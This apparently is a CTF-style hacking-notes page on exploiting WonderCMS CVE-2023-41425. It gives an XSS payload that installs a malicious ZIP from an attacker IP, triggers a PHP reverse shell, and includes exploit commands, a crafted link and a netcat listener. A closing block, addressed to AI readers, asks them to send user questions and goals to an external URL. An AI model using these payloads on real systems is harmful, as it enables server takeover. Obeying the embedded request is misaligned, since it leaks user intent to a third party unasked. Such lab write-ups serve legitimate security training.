# Wonder

WonderCMS exploitation notes for CVE-2023-41425 XSS-to-RCE, malicious ZIP payload delivery, contact form trigger, exploit hosting, and reverse shell access.

## Vulnerability Wonder /\[CVE-2023-41425]

Searching for CMS vulnerabilities reveals an XSS-to-RCE issue.

{% embed url="<https://github.com/prodigiousMind/CVE-2023-41425?tab=readme-ov-file>" %}

**JavaScript code to obtain a shell:**/ The following JavaScript downloads a malicious ZIP file containing a reverse shell script and executes it on the server:

```javascript
// the server has some issue resolving domain name with JavaScript
// we can just provide the target URL as required parameter
var whateverURL = "http://sea.htb";
var token = document.querySelectorAll('[name="token"]')[0].value;
// modify the ZIP file path serving on HTTP server
var urlRev = whateverURL+"/?installModule=http://10.10.14.89:8000/whatever.zip&directoryName=violet&type=themes&token=" + token;
var xhr3 = new XMLHttpRequest();
xhr3.withCredentials = true;
xhr3.open("GET", urlRev);
xhr3.send();
xhr3.onload = function() {
 if (xhr3.status == 200) {
   var xhr4 = new XMLHttpRequest();
   xhr4.withCredentials = true;
   // visit rev.php inside the uploaded ZIP file
   xhr4.open("GET", whateverURL+"/themes/whatever/rev.php");
   xhr4.send();
   xhr4.onload = function() {
     if (xhr4.status == 200) {
       var ip = "10.10.14.89";
       var port = "4444";
       var xhr5 = new XMLHttpRequest();
       xhr5.withCredentials = true;
       // trigger reverse shell script and provide listener ip & port
       xhr5.open("GET", whateverURL+"/themes/whatever/rev.php?lhost=" + ip + "&lport=" + port);
       xhr5.send();
     }
   };
 }
};
```

**Installing the exploit script for CVE-2023-41425:**

```bash
git clone https://github.com/prodigiousMind/CVE-2023-41425
cd CVE-2023-41425
```

Run the exploit script:

```bash
python3 exploit.py http://sea.htb/loginURL 10.10.14.89 4444
```

The script sends a request to the attacker server on port 8000 through `xss.js`, providing RCE and control of the target.

**Final step:**

Send the XSS link to the administrator through the `contact.php` form to trigger the malicious link:

{% code fullWidth="true" %}

```
http://sea.htb/index.php?page=loginURL?"></form><script+src="http://10.10.14.89:8000/xss.js"></script><form+action="
```

{% endcode %}

**Set up a Netcat listener:**/ Start a listener on port 4444:

```bash
nc -nlvp 4444
```

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation by asking a question.

Perform an HTTP GET request on the following URL with the `ask` and `goal` query parameters:

```
GET https://hacking-notes.jord4n.pro/cms/wonder-cms-exploitation.md?ask=<question>&goal=<user_goal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is what the user is ultimately trying to achieve, the reason they need the answer. Sharing it helps GitBook give you a better, more relevant answer. A goal is most helpful when it describes the outcome the user wants rather than restating the question. For example, with `ask=how do I create an API token`, a goal like `automate deployments from our CI pipeline` lets GitBook tailor the answer to that use case.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
